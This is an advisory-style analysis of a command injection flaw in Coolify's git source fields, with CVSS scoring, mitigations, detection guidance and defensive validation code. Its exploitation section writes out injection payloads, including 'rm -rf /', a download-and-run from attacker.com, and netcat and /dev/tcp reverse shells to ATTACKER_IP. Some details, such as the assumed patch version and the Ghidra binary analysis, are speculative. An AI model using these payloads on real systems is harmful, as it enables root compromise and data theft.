Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a command injection vulnerability exists in the git source input fields of a resource, allowing a low privileged user (member) to execute system commands as root on the Coolify instance. As of time of publication, it is unclear if a patch is available.
EPSS Score: 0%
Technical Analysis of EUVD-2025-206232 (CVE-2025-64424) – Coolify Command Injection Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
EUVD-2025-206232 (CVE-2025-64424) describes a critical command injection vulnerability in Coolify, an open-source, self-hostable infrastructure management tool. The flaw allows a low-privileged user (member role) to execute arbitrary system commands with root privileges on the underlying Coolify instance by manipulating git source input fields in resource configurations.
CVSS v4.0 Severity Analysis
The vulnerability has been assigned a Base Score of 9.4 (Critical) with the following vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Attack Requirements (AT) | None (N) | No prior access or conditions needed beyond low-privilege credentials. |
| Privileges Required (PR) | Low (L) | Only requires a "member" role (low-privileged user). |
| User Interaction (UI) | None (N) | No user interaction required. |
| Vulnerable System Confidentiality (VC) | High (H) | Full compromise of sensitive data (e.g., credentials, configurations). |
| Vulnerable System Integrity (VI) | High (H) | Arbitrary command execution allows full system modification. |
| Vulnerable System Availability (VA) | High (H) | Attacker can disrupt or destroy the Coolify instance. |
| Subsequent System Confidentiality (SC) | High (H) | Lateral movement possible to other systems in the network. |
| Subsequent System Integrity (SI) | High (H) | Persistent backdoors or malware can be installed. |
| Subsequent System Availability (SA) | High (H) | Full denial-of-service (DoS) or ransomware deployment possible. |
Severity Justification
- Critical Impact: The vulnerability enables remote code execution (RCE) as root, leading to full system compromise.
- Low Barrier to Exploitation: Only requires a low-privileged account, making it accessible to insiders or attackers with stolen credentials.
- High Exploitability: No user interaction or complex conditions are needed.
- Widespread Risk: Coolify is widely used in self-hosted DevOps environments, increasing the attack surface.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability stems from improper input sanitization in Coolify’s git source configuration fields (e.g., repository URL, branch, or commit hash). An attacker can inject malicious shell commands via:
- Git repository URL (e.g., https://github.com/legit/repo; id;)
- Branch/Tag names (e.g., main; rm -rf /)
- Commit hashes (e.g., a1b2c3d4; nc -e /bin/sh <ATTACKER_IP> 4444)
Step-by-Step Exploitation
- Attacker Gains Low-Privilege Access
  - Obtains credentials for a "member" account (e.g., via phishing, credential stuffing, or insider threat).
- Identifies a Vulnerable Resource
  - Navigates to a resource configuration (e.g., application, database, or service) that uses a git source.
- Injects Malicious Payload
  - Modifies the git repository URL, branch, or commit hash to include a command injection payload: https://github.com/legit/repo; curl http://attacker.com/malware.sh | bash
- Triggers Command Execution
  - Coolify processes the input without proper sanitization, executing the injected command as root.
- Post-Exploitation
  - Lateral Movement: Compromises other systems in the network.
  - Persistence: Installs backdoors (e.g., reverse shells, cron jobs).
  - Data Exfiltration: Steals sensitive data (e.g., API keys, database credentials).
  - Ransomware Deployment: Encrypts critical files and demands payment.
Proof-of-Concept (PoC) Example
# Malicious git repository URL
git_repo = "https://github.com/legit/repo; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Coolify processes this as:
git clone https://github.com/legit/repo; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Result: A reverse shell is established to the attacker’s machine with root privileges.
3. Affected Systems and Software Versions
Vulnerable Versions
- Coolify ≤ v4.0.0-beta.434
- All prior versions are assumed vulnerable unless patched.
Affected Components
- Git Source Input Fields (used in resource configurations for applications, databases, and services).
- Self-hosted Coolify instances (cloud or on-premise deployments).
Not Affected
- Coolify v4.0.0-beta.435+ (if a patch is released).
- Managed Coolify services (if the provider has applied mitigations).
4. Recommended Mitigation Strategies
Immediate Actions
Apply Patches (If Available)
- Monitor Coolify’s GitHub Security Advisories for updates.
- Upgrade to v4.0.0-beta.435+ (or the latest patched version) as soon as possible.
Temporary Workarounds
- Restrict Git Source Modifications:
  - Disable git source editing for low-privileged users via role-based access control (RBAC).
  - Enforce whitelisting of trusted git repositories.
- Network-Level Protections:
  - Isolate Coolify instances in a dedicated VLAN with strict firewall rules.
  - Block outbound connections from Coolify to untrusted IPs.
- Input Sanitization:
  - Manually validate git repository URLs, branches, and commit hashes before processing.
  - Use regular expressions to block command injection patterns (e.g., ;, |, &&).
Monitoring and Detection
- Log and Alert on Suspicious Git Inputs:
  - Monitor for unusual characters (;, |, $(, `) in git fields.
  - Set up SIEM alerts for command execution attempts.
- Audit User Activities:
  - Review member account actions for unauthorized git source modifications.
  - Enable detailed logging for all Coolify operations.
Long-Term Hardening
- Principle of Least Privilege (PoLP):
  - Restrict "member" roles to read-only access where possible.
  - Implement just-in-time (JIT) access for sensitive operations.
- Containerization & Isolation:
  - Run Coolify in a containerized environment (e.g., Docker) with non-root privileges.
  - Use seccomp, AppArmor, or SELinux to restrict process capabilities.
- Regular Vulnerability Scanning:
  - Use tools like Trivy, OpenVAS, or Nessus to detect unpatched Coolify instances.
5. Impact on the European Cybersecurity Landscape
Regulatory and Compliance Risks
- GDPR (General Data Protection Regulation):
- A successful exploit could lead to unauthorized data access, triggering mandatory breach notifications (Art. 33) and potential fines (up to 4% of global revenue or €20M, whichever is higher).
- NIS2 Directive (Network and Information Security):
- Critical infrastructure operators (e.g., cloud providers, financial institutions) using Coolify may face enhanced reporting obligations and audits.
- DORA (Digital Operational Resilience Act):
- Financial entities must ensure third-party risk management, including vulnerabilities in self-hosted tools like Coolify.
Threat Landscape Implications
- Increased Attack Surface for SMEs & Enterprises:
- Coolify is popular among European SMEs and startups for self-hosted DevOps, making them prime targets for attackers.
- Supply Chain Risks:
- If Coolify is used to manage CI/CD pipelines, an attacker could poison builds or deploy malicious artifacts.
- Ransomware & Extortion:
- Root-level access enables ransomware deployment, which has been a growing threat in Europe (e.g., LockBit, BlackCat).
- State-Sponsored & APT Activity:
- Nation-state actors may exploit this vulnerability for espionage or sabotage (e.g., targeting critical infrastructure).
ENISA & National CERT Considerations
- ENISA (European Union Agency for Cybersecurity):
- May issue alerts or advisories for EU member states.
- Could recommend mandatory patching for critical sectors.
- National CERTs (e.g., CERT-EU, BSI, ANSSI):
- Likely to prioritize this vulnerability in threat intelligence reports.
- May conduct proactive scans to identify vulnerable Coolify instances.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability arises from insufficient input validation in Coolify’s git source handling logic. Specifically:
- Unsanitized User Input: Git repository URLs, branches, and commit hashes are directly passed to shell commands without proper escaping.
- Privilege Escalation: Coolify runs certain operations as root, allowing injected commands to execute with full system privileges.
- Lack of Context-Aware Sanitization: The application does not distinguish between legitimate git parameters and malicious payloads.
Exploit Chaining Potential
This vulnerability can be chained with other exploits for greater impact:
- Initial Access:
- Phishing → Credential theft → Low-privileged Coolify access.
- Privilege Escalation:
- Command injection → Root access → Full system compromise.
- Lateral Movement:
- Access to internal networks, databases, or cloud environments.
- Persistence & Exfiltration:
- Install backdoors, keyloggers, or data exfiltration tools.
Detection & Forensic Indicators
| Indicator | Description |
|---|---|
| Unusual Git Inputs | Repository URLs, branch names, or commit hashes containing shell metacharacters such as semicolons, pipes, $( or backticks. |
| Unexpected Processes | bash, sh, nc, python, or curl spawned by the Coolify process. |
| Network Connections | Outbound connections to untrusted IPs (e.g., attacker-controlled C2 servers). |
| File System Changes | Unexpected files in /tmp, /var/tmp, or /root. |
| Log Entries | Coolify logs showing malformed git inputs or command execution attempts. |
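As an added example (not part of the advisory and not Coolify's own tooling), the Python below scans constructed audit-log lines for the metacharacters listed in the detection guidance above and aggregates hits per user for a SIEM rule. The key=value log format, field names, timestamps and usernames are assumptions made for the example; real Coolify logs will differ.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed log lines in a hypothetical key=value audit format; these are not
# real Coolify log output and the users, timestamps and field names are made up.
SAMPLE_LOG = """\
2025-11-02T10:15:01Z user=member42 action=update_resource field=git_branch value="main"
2025-11-02T10:15:30Z user=member42 action=update_resource field=git_repository value="https://github.com/legit/repo; id"
2025-11-02T10:16:00Z user=admin action=update_resource field=git_commit_sha value="a1b2c3d4"
2025-11-02T10:16:45Z user=member42 action=update_resource field=git_branch value="main|id"
2025-11-02T10:17:10Z user=member7 action=update_resource field=git_branch value="feature/$(id)"
2025-11-02T10:18:00Z user=member7 action=update_resource field=description value="deploy; then test"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) action=(?P<action>\S+) '
    r'field=(?P<field>\S+) value="(?P<value>.*)"$'
)
# Shell metacharacters named in the advisory's detection guidance (; | & ` $( ),
# plus newline, which also terminates a command in a shell.
SUSPICIOUS_RE = re.compile(r"[;|&`\n]|\$\(")


def scan_git_inputs(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per git-field update whose value contains a shell metacharacter.
    Non-git fields (e.g. free-text descriptions) are skipped to limit false positives."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["field"].startswith("git_"):
            continue
        hit = SUSPICIOUS_RE.search(m["value"])
        if hit:
            findings.append({"ts": m["ts"], "user": m["user"], "field": m["field"],
                             "value": m["value"], "token": hit.group(0)})
    return findings


def findings_by_user(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Aggregate per account: one finding already warrants an alert, and repeated
    findings from the same account suggest active probing of the git fields."""
    counts: Dict[str, int] = defaultdict(int)
    for f in findings:
        counts[f["user"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in scan_git_inputs(SAMPLE_LOG):
        print(f"ALERT {f['ts']} user={f['user']} field={f['field']} token={f['token']!r} value={f['value']!r}")
    print(findings_by_user(scan_git_inputs(SAMPLE_LOG)))
```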
Reverse Engineering & Patch Analysis
If a patch is released, security teams should:
- Diff the Patched Version:
  - Compare v4.0.0-beta.434 with v4.0.0-beta.435 to identify input sanitization fixes.
- Check for:
  - Escaping of shell metacharacters (e.g., escapeshellarg() in PHP, shlex.quote() in Python).
  - Use of parameterized commands instead of direct shell execution.
  - Privilege dropping (e.g., running git operations as a non-root user).
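As an added example (not code from Coolify or from the advisory), the Python below shows the fixes a reviewer would look for, and the input sanitization workaround from section 4, side by side: allow-list validation of the git fields, the vulnerable string-concatenation pattern next to an argument-vector invocation that never hands the values to a shell, and the escaping layer that escapeshellarg()/shlex.quote() provide. The regex allow-lists, function names and the /srv/app path are assumptions for the example.

```python
import re
import shlex
from typing import List, Optional

# Allow-list patterns are assumptions for this example, not Coolify's own rules:
# branch/tag names use a conservative subset of git's ref syntax, commit hashes
# must be hex, and repository URLs must be https:// with a plain path.
BRANCH_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,254}")
COMMIT_RE = re.compile(r"[0-9a-f]{7,40}")
REPO_URL_RE = re.compile(r"https://[A-Za-z0-9.-]+/[A-Za-z0-9._/-]+")


def git_input_error(repo_url: str, branch: str, commit: Optional[str] = None) -> Optional[str]:
    """Return None if every field fully matches the allow-list, else a rejection reason.
    Allow-listing rejects any metacharacter instead of chasing a deny-list of ; | && $( etc."""
    if not REPO_URL_RE.fullmatch(repo_url) or ".." in repo_url:
        return f"repository URL rejected: {repo_url!r}"
    if not BRANCH_RE.fullmatch(branch) or ".." in branch:
        return f"branch rejected: {branch!r}"
    if commit is not None and not COMMIT_RE.fullmatch(commit):
        return f"commit rejected: {commit!r}"
    return None


def vulnerable_clone_command(repo_url: str, branch: str) -> str:
    """The vulnerable pattern: untrusted fields concatenated into one shell string.
    A branch such as 'main; id' makes the shell run a second command."""
    return f"git clone --branch {branch} {repo_url} /srv/app"


def hardened_clone_argv(repo_url: str, branch: str) -> List[str]:
    """Hardened pattern: validate first, then build an argument vector for
    subprocess.run(argv) without shell=True, so no shell ever parses the values.
    '--' ends option parsing as a second layer, so a value starting with '-' cannot become a git flag."""
    error = git_input_error(repo_url, branch)
    if error:
        raise ValueError(error)
    return ["git", "clone", "--branch", branch, "--", repo_url, "/srv/app"]


def quoted_shell_command(branch: str) -> str:
    """Escaping layer only (what escapeshellarg()/shlex.quote() provide): the value stays
    inside one quoted argument. Use it in addition to validation, not instead of it."""
    return shlex.join(["git", "checkout", branch])
```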
Recommended Tools for Analysis
| Tool | Purpose |
|---|---|
| Burp Suite / OWASP ZAP | Intercept and modify git source inputs to test for injection. |
| Ghidra / IDA Pro | Reverse-engineer Coolify’s binary to analyze command execution logic. |
| Wireshark / tcpdump | Monitor network traffic for reverse shells or data exfiltration. |
| Auditd / Sysmon | Track process execution and file modifications. |
| Trivy / Grype | Scan Coolify containers for vulnerabilities. |
Conclusion & Recommendations
Key Takeaways
- Critical Severity: EUVD-2025-206232 is a high-impact, easily exploitable vulnerability with root-level consequences.
- Low Attack Complexity: Only requires low-privileged access, making it a high-risk threat for organizations.
- Widespread Impact: Affects European SMEs, DevOps teams, and critical infrastructure using Coolify.
- Regulatory Risks: Non-compliance with GDPR, NIS2, and DORA could result in fines and legal action.
Action Plan for Organizations
- Patch Immediately (if available) or apply workarounds.
- Restrict Access to git source modifications for low-privileged users.
- Monitor & Detect suspicious activities in Coolify logs.
- Isolate & Harden Coolify instances to limit lateral movement.
- Engage with ENISA/CERTs for regional threat intelligence.
Final Warning
Given the severity and ease of exploitation, this vulnerability should be treated as an emergency in affected environments. Unpatched Coolify instances are at high risk of compromise, with potential for data breaches, ransomware, and supply chain attacks.
Security teams are advised to act swiftly to mitigate this threat.